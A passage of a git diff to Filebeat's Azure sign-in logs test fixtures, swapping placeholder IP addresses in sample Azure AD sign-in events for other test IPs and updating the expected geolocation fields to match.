MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"216.160.83.61","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"}
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json
index a2d74cd86d04..2787dd45a969 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json
@@ -163,7 +163,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "0",
         "azure.tenant_id": "22222222-902d-4dea-8026-5a790862fede",
-        "client.ip": "11.22.33.44",
+        "client.ip": "216.160.83.61",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -174,7 +174,7 @@
         "event.id": "22222222-fb7b-4f83-bf74-3876f9ef3900",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA f\u00fcr G\u00e4ste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}",
+        "event.original": "{\"Level\":4,\"callerIpAddress\":\"216.160.83.61\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA f\u00fcr G\u00e4ste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"216.160.83.61\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}",
         "event.outcome": "success",
         "event.type": [
             "info"
@@ -189,16 +189,20 @@
         "log.level": "4",
         "log.offset": 0,
         "related.ip": [
-            "11.22.33.44"
+            "216.160.83.61"
         ],
         "service.type": "azure",
-        "source.address": "11.22.33.44",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
-        "source.ip": "11.22.33.44",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log
index 88049d7edef3..2943c29665d6 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log
@@ -1 +1 @@
-{"Level":4,"callerIpAddress":"11.22.33.44","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"}
+{"Level":4,"callerIpAddress":"216.160.83.61","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"216.160.83.61","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"}
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json
index 0ec6daf9adf5..4de266113a0d 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json
@@ -29,7 +29,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "7000222",
         "azure.tenant_id": "1111111111-902d-4dea-8026-5a790862fede",
-        "client.ip": "11.22.33.44",
+        "client.ip": "216.160.83.61",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -40,7 +40,7 @@
         "event.id": "22222222-5ec0-4795-bf9f-9017bcc32f00",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}",
+        "event.original": "{\"Level\":4,\"callerIpAddress\":\"216.160.83.61\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"216.160.83.61\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}",
         "event.outcome": "failure",
         "event.type": [
             "info"
@@ -55,16 +55,20 @@
         "log.level": "4",
         "log.offset": 0,
         "related.ip": [
-            "11.22.33.44"
+            "216.160.83.61"
         ],
         "service.type": "azure",
-        "source.address": "11.22.33.44",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
-        "source.ip": "11.22.33.44",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "forwarded"
         ]
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
index 4461734e570a..f0af6d501187 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
@@ -1,2 +1,2 @@
-{"Level":"4","callerIpAddress":"1.1.1.1","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"1.1.1.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
-{"Level":"4","callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"8.8.8.8","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
+{"Level":"4","callerIpAddress":"89.160.20.156","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"89.160.20.156","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
